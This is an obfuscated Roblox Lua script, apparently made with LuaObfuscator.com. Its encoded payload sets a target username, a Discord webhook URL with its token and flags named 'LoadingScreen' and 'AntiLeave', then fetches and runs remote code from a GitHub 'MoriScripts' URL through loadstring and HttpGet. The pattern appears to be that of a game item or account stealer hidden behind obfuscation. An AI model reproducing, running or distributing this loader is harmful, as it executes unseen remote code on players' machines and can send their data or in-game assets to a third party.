--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.13) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v84=0 -0 ;local v85;while true do if (v84==0) then v85=(v31/((1 + 1)^(v32-((4 -3) + 0))))%((5 -3)^(((v33-(1 -0)) -(v32-((119 -(32 + 85)) -1))) + 1)) ;return v85-(v85%(1 -0)) ;end end else local v86=(621 -(555 + 64))^(v32-1) ;return (((v31%(v86 + v86))>=v86) and (932 -(857 + 74))) or (568 -(367 + 201)) ;end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34,v35,v36,v37=v1(v16,v19,v19 + 3 );v19=v19 + 4 + 0 ;return (v37 * 16777216) + (v36 * (14533 + 51003)) + (v35 * (1213 -(892 + 65))) + v34 ;end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v38=0;local v39;local v40;local v41;local v42;local v43;local v44;local v45;local v46;while true do if (v38~=0) then else v39=0;v40=nil;v38=1;end if (v38~=(6 -2)) then else while true do if (v39==2) then local v97=0;while true do if (0~=v97) then else local v107=0;while true do if (v107~=0) then else v44=nil;v45=nil;v107=121 -(30 + 90) ;end if (v107==(1 + 0)) then v97=1 + 0 ;break;end end end if (v97==(1 + 0)) then v39=3;break;end end end if (v39==(0 + 0)) then local v98=0;local v99;while true do if ((0 -0)~=v98) then else v99=0 -0 ;while true do if (v99==1) then v39=2 -1 ;break;end if (v99==(0 + 0)) then local v134=0;while true do if (v134~=0) then else v40=0;v41=nil;v134=1;end if (v134~=(1 + 0)) then else v99=397 -(115 + 281) ;break;end end end end break;end end end if (v39~=(2 -1)) then else v42=nil;v43=nil;v39=2;end if (v39==(3 + 0)) then v46=nil;while true do local v100=0;local v101;while true do if (0==v100) then v101=0 -0 ;while true do if (v101~=(0 -0)) then else local v135=867 -(550 + 317) ;while true do if (v135~=0) then else if (v40==0) then local v177=0 -0 ;local v178;while true do if (v177==0) then v178=0 -0 ;while true do if (v178~=(0 -0)) then else local v185=0;while true do if (v185~=(285 -(134 + 151))) then else local v195=0;while true do if (v195==(1666 -(970 + 695))) then v185=1;break;end if (v195~=0) then else v41={};v42={};v195=1;end end end if (v185~=(1 -0)) then else v178=1991 -(582 + 1408) ;break;end end end if (v178~=2) then else v40=3 -2 ;break;end if (v178==(1 -0)) then local v186=0 -0 ;local v187;while true do if (v186==0) then v187=0;while true do if (v187==1) then v178=1826 -(1195 + 629) ;break;end if (v187==(0 -0)) then local v197=241 -(187 + 54) ;while true do if (v197~=0) then else v43={};v44={v41,v42,nil,v43};v197=1 + 0 ;end if (v197~=(1 + 0)) then else v187=1 -0 ;break;end end end end break;end end end end break;end end end if (v40~=2) then else local v179=0 -0 ;local v180;while true do if (v179==0) then v180=0 + 0 ;while true do local v183=1636 -(1373 + 263) ;local v184;while true do if (v183~=0) then else v184=0;while true do if (v184==0) then if (v180~=1) then else return v44;end if ((1000 -(451 + 549))==v180) then for v198=1,v24() do local v199=0 + 0 ;local v200;local v201;while true do if (v199==0) then local v205=0;while true do if ((0 -0)==v205) then v200=0 -0 ;v201=nil;v205=1385 -(746 + 638) ;end if (v205==1) then v199=1;break;end end end if (v199==(1 + 0)) then while true do if (v200~=(0 -0)) then else v201=v22();if (v21(v201,342 -(218 + 123) ,1)~=0) then else local v210=1581 -(1535 + 46) ;local v211;local v212;local v213;local v214;local v215;while true do if ((1 + 0)~=v210) then else v213=nil;v214=nil;v210=2;end if (v210~=2) then else v215=nil;while true do if (v211==(1 + 0)) then local v218=0;while true do if (v218~=(561 -(306 + 254))) then else v211=2;break;end if (v218==0) then v214=nil;v215=nil;v218=1 + 0 ;end end end if (v211==(0 -0)) then local v219=1467 -(899 + 568) ;while true do if (v219~=(1 + 0)) then else v211=1;break;end if (v219==(0 -0)) then v212=603 -(268 + 335) ;v213=nil;v219=291 -(60 + 230) ;end end end if (v211==2) then while true do if (v212~=(572 -(426 + 146))) then else v213=v21(v201,1 + 1 ,1459 -(282 + 1174) );v214=v21(v201,4,817 -(569 + 242) );v212=2 -1 ;end if ((1 + 2)~=v212) then else if (v21(v214,1027 -(706 + 318) ,1254 -(721 + 530) )~=1) then else v215[1275 -(945 + 326) ]=v46[v215[9 -5 ]];end v41[v198]=v215;break;end if (v212==(1 + 0)) then v215={v23(),v23(),nil,nil};if (v213==(1500 -(1408 + 92))) then local v225=0;local v226;while true do if (0==v225) then v226=1086 -(461 + 625) ;while true do if (v226~=0) then else v215[3]=v23();v215[1292 -(993 + 295) ]=v23();break;end end break;end end elseif (v213==(1 + 0)) then v215[3]=v24();elseif (v213==2) then v215[1174 -(418 + 753) ]=v24() -((1 + 1)^16) ;elseif (v213==(1 + 2)) then local v235=0;local v236;local v237;while true do if (v235~=1) then else while true do if (v236==0) then v237=0;while true do if ((0 + 0)==v237) then v215[3]=v24() -((1 + 1)^16) ;v215[533 -(406 + 123) ]=v23();break;end end break;end end break;end if (0~=v235) then else v236=1769 -(1749 + 20) ;v237=nil;v235=1;end end end v212=2;end if ((1 + 1)==v212) then local v221=0;while true do if (v221==1) then v212=1325 -(1249 + 73) ;break;end if (v221~=0) then else if (v21(v214,1,1)~=(1 + 0)) then else v215[2]=v46[v215[1147 -(466 + 679) ]];end if (v21(v214,2,2)~=(2 -1)) then else v215[3]=v46[v215[8 -5 ]];end v221=1901 -(106 + 1794) ;end end end end break;end end break;end if (v210==(0 + 0)) then v211=0 + 0 ;v212=nil;v210=2 -1 ;end end end break;end end break;end end end for v202=2 -1 ,v24() do v42[v202-1 ]=v29();end v180=115 -(4 + 110) ;end break;end end break;end end end break;end end end v135=1;end if (v135~=1) then else v101=1;break;end end end if (v101==1) then if (v40~=1) then else local v172=584 -(57 + 527) ;while true do if (v172~=(1428 -(41 + 1386))) then else local v181=0;while true do if (v181~=0) then else local v182=103 -(17 + 86) ;while true do if (v182==(0 + 0)) then for v189=1,v45 do local v190=0;local v191;local v192;local v193;local v194;while true do if (v190~=(0 -0)) then else local v196=0;while true do if (v196==(2 -1)) then v190=167 -(122 + 44) ;break;end if (v196~=0) then else v191=0 -0 ;v192=nil;v196=3 -2 ;end end end if (v190==(2 + 0)) then while true do if (1==v191) then v194=nil;while true do if (v192==1) then if (v193==1) then v194=v22()~=0 ;elseif (v193==(1 + 1)) then v194=v25();elseif (v193==(5 -2)) then v194=v26();end v46[v189]=v194;break;end if (0==v192) then local v207=65 -(30 + 35) ;local v208;local v209;while true do if (v207~=0) then else v208=0;v209=nil;v207=1 + 0 ;end if (v207==1) then while true do if (0~=v208) then else v209=1257 -(1043 + 214) ;while true do if (0==v209) then local v216=0;local v217;while true do if (v216~=0) then else v217=0 -0 ;while true do if (v217~=(1213 -(323 + 889))) then else v209=2 -1 ;break;end if (v217~=(580 -(361 + 219))) then else local v222=320 -(53 + 267) ;while true do if (v222==(1 + 0)) then v217=1;break;end if (v222~=(413 -(15 + 398))) then else v193=v22();v194=nil;v222=1;end end end end break;end end end if (v209~=1) then else v192=983 -(18 + 964) ;break;end end break;end end break;end end end end break;end if (v191~=0) then else local v204=0 -0 ;while true do if (v204==(1 + 0)) then v191=1;break;end if ((0 + 0)==v204) then v192=0;v193=nil;v204=851 -(20 + 830) ;end end end end break;end if (v190~=(1 + 0)) then else v193=nil;v194=nil;v190=128 -(116 + 10) ;end end end v44[3]=v22();v182=1;end if (v182~=(1 + 0)) then else v181=739 -(542 + 196) ;break;end end end if (v181==(1 -0)) then v172=1 + 1 ;break;end end end if (v172==(2 + 0)) then v40=1 + 1 ;break;end if (v172~=(0 -0)) then else v45=v24();v46={};v172=1;end end end break;end end break;end end end break;end end break;end if (v38==1) then v41=nil;v42=nil;v38=2;end if (v38==2) then v43=nil;v44=nil;v38=3;end if (v38~=(7 -4)) then else v45=nil;v46=nil;v38=1555 -(1126 + 425) ;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v47=v24();local v48=v24();local v49=406 -(118 + 287) ;local v50=(v21(v48,1 + 0 ,78 -58 ) * ((755 -((1819 -(1183 + 397)) + 514))^(1153 -(118 + 1003)))) + v47 ;local v51=v21(v48,(185 -124) -40 ,23 + 8 );local v52=((v21(v48,409 -(142 + 235) )==((3 + 1) -(3 + 0))) and  -1) or ((1976 -(1913 + 62)) + 0) ;if (v51==(731 -(476 + 255))) then if (v50==(977 -(553 + 424))) then return v52 * (0 -0) ;else local v91=0 + 0 ;while true do if (v91==(0 + 0)) then v51=1 -0 ;v49=0 + 0 ;break;end end end elseif (v51==(871 + 1176)) then return ((v50==(0 -0)) and (v52 * ((1 + 0 + 0 + 0)/(0 -(1504 -(363 + 1141)))))) or (v52 * NaN) ;end return v8(v52,v51-(2849 -1826) ) * (v49 + (v50/((218 -(42 + 174))^(40 + 12)))) ;end v26=nil;function v26(v53)local v54;if  not v53 then v53=v24();if (v53==(0 + 0)) then return "";end end v54=v3(v16,v19,(v19 + v53) -(2 -1) );v19=v19 + v53 ;local v55={};for v68=1934 -(565 + 1368) , #v54 do v55[v68]=v2(v1(v3(v54,v68,v68)));end return v6(v55);end v18=5;end if (v18==2) then function v22()local v56=0 -0 ;local v57;while true do if (v56==((2 -1) + 0)) then return v57;end if (v56==((1160 -(244 + 60)) -(564 + 292))) then v57=v1(v16,v19,v19);v19=v19 + 1 ;v56=1662 -(1477 + 184) ;end end end v23=nil;function v23()local v58=0 + 0 ;local v59;local v60;while true do if (v58==1) then return (v60 * (732 -(41 + 435))) + v59 ;end if (v58==(1001 -(938 + 63))) then v59,v60=v1(v16,v19,v19 + 2 + 0 );v19=v19 + (1127 -(936 + 189)) ;v58=(1614 -(1565 + 48)) + 0 ;end end end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v61)if (v1(v61,2)==79) then v20=v0(v3(v61,1,1));return "";else local v87=v2(v0(v61,16));if v20 then local v92=v5(v87,v20);v20=nil;return v92;else return v87;end end end);v18=1;end if (v18==7) then function v30(v62,v63,v64)local v65=v62[1];local v66=v62[2];local v67=v62[3];return function(...)local v70=v65;local v71=v66;local v72=v67;local v73=v28;local v74=1;local v75= -1;local v76={};local v77={...};local v78=v12("#",...) -1 ;local v79={};local v80={};for v88=0,v78 do if (v88>=v72) then v76[v88-v72 ]=v77[v88 + 1 ];else v80[v88]=v77[v88 + 1 ];end end local v81=(v78-v72) + 1 ;local v82;local v83;while true do v82=v70[v74];v83=v82[1];if (v83<=5) then if (v83<=2) then if (v83<=0) then v80[v82[2]]=v82[3]~=0 ;elseif (v83>1) then local v108=0;local v109;local v110;local v111;local v112;while true do if (0==v108) then v109=v82[2];v110,v111=v73(v80[v109](v13(v80,v109 + 1 ,v82[3])));v108=1;end if (v108==1) then v75=(v111 + v109) -1 ;v112=0;v108=2;end if (v108==2) then for v168=v109,v75 do local v169=0;while true do if (v169==0) then v112=v112 + 1 ;v80[v168]=v110[v112];break;end end end break;end end else v80[v82[2]]=v82[3];end elseif (v83<=3) then do return;end elseif (v83>4) then local v115=0;local v116;local v117;local v118;local v119;local v120;while true do if (v115==7) then v116=0;for v170=v120,v75 do local v171=0;while true do if (v171==0) then v116=v116 + 1 ;v80[v170]=v117[v116];break;end end end v74=v74 + 1 ;v82=v70[v74];v115=8;end if (v115==4) then v80[v120]=v119[v82[4]];v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]=v82[3];v115=5;end if (v115==0) then v116=nil;v117,v118=nil;v119=nil;v120=nil;v115=1;end if (v115==1) then v80[v82[2]][v82[3]]=v82[4];v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]=v64[v82[3]];v115=2;end if (v115==6) then v82=v70[v74];v120=v82[2];v117,v118=v73(v80[v120](v13(v80,v120 + 1 ,v82[3])));v75=(v118 + v120) -1 ;v115=7;end if (v115==5) then v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]=v82[3]~=0 ;v74=v74 + 1 ;v115=6;end if (v115==3) then v82=v70[v74];v120=v82[2];v119=v80[v82[3]];v80[v120 + 1 ]=v119;v115=4;end if (v115==2) then v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]=v64[v82[3]];v74=v74 + 1 ;v115=3;end if (v115==8) then v120=v82[2];v80[v120]=v80[v120](v13(v80,v120 + 1 ,v75));v74=v74 + 1 ;v82=v70[v74];v115=9;end if (v115==9) then v80[v82[2]]();v74=v74 + 1 ;v82=v70[v74];do return;end break;end end else v80[v82[2]]=v64[v82[3]];end elseif (v83<=8) then if (v83<=6) then v64[v82[3]]=v80[v82[2]];elseif (v83>7) then local v123=0;local v124;local v125;while true do if (v123==1) then v80[v124 + 1 ]=v125;v80[v124]=v125[v82[4]];break;end if (v123==0) then v124=v82[2];v125=v80[v82[3]];v123=1;end end else local v126=v82[2];v80[v126]=v80[v126](v13(v80,v126 + 1 ,v75));end elseif (v83<=9) then v80[v82[2]][v82[3]]=v82[4];elseif (v83>10) then v80[v82[2]]();else v80[v82[2]]=v82[3];v74=v74 + 1 ;v82=v70[v74];v64[v82[3]]=v80[v82[2]];v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]=v82[3];v74=v74 + 1 ;v82=v70[v74];v64[v82[3]]=v80[v82[2]];v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]=v82[3];v74=v74 + 1 ;v82=v70[v74];v64[v82[3]]=v80[v82[2]];v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]=v64[v82[3]];v74=v74 + 1 ;v82=v70[v74];v80[v82[2]][v82[3]]=v82[4];v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]=v64[v82[3]];v74=v74 + 1 ;v82=v70[v74];v80[v82[2]][v82[3]]=v82[4];end v74=v74 + 1 ;end end;end return v30(v29(),{},v17)(...);end end end v15("LOL!0E3O0003083O00557365724E616D65030A3O00412O6E6530363233323403073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3133342O32353130333533343730362O37392F726B7A6162784D3272437732385F663772435F666E77696A2D32474D673455622D47385F514167647555685F72776D384467756476494858464A61654E356A5F496C424B03093O00557365724E616D653203023O005F47030D3O004C6F6164696E675363722O656E2O0103093O00416E74694C6561766503093O004D6F7573654C6F636B030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A00153O00120A3O00023O00124O00013O00124O00043O00124O00033O00124O00023O00124O00053O00124O00063O00304O0007000800124O00063O00304O000900080012043O00063O0030053O000A000800124O000B3O00122O0001000C3O00202O00010001000D00122O0003000E6O000400016O000100049O0000026O000100016O00017O00",v9(),...);
